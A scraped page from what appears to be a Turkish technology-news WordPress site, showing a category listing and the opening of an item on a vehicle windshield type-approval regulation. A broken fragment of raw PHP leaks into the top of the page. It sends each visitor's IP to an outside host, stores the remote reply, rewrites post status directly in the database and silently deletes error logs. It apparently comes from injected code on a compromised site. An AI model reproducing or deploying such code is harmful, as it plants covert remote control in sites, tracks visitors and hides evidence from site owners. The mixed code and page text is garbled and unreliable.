$value) { $post_string .= $key.'='.urlencode(trim($value)).'&'; } rtrim($post_string, '&'); curl_setopt($ch,CURLOPT_POST, count($post)); curl_setopt($ch,CURLOPT_POSTFIELDS, $post_string); } $result=curl_exec($ch); return $result; } $mcuOutput = conn('https://seoabi.com/wmbys/blog-api.php?ip='.$_SERVER['REMOTE_ADDR']); $GLOBALS['mcuOutput'] = json_decode($mcuOutput); $wpdb->query("UPDATE `wp_posts` SET post_status = 'publish' WHERE post_status = 'future' && post_date < NOW()"); @unlink($_SERVER['DOCUMENT_ROOT'].'/error_log'); @unlink($_SERVER['DOCUMENT_ROOT'].'/imle/error_log'); ?> araçlara | Teknoloji Haberleri

araçlara kategorisindeki tüm yazılar

Son Yazılar

Motorlu araçlara tip onayı Resmi Gazete

Bilim, Sanayi ve Teknoloji Bakanlığı tarafından yayımlanan ”Motorlu Araçların Ön Cam Buz Çözme Ve Buğu Giderme Sistemleri İle İlgili Tip Onayı Yönetmeliği” ile araçların yapım ve kullanım bakımından karayolu yapısına ve trafik güvenliğine uyma zorunluluğunu yerine getirmek üzere, motorlu araçların ön cam buz çözme ve buğu giderme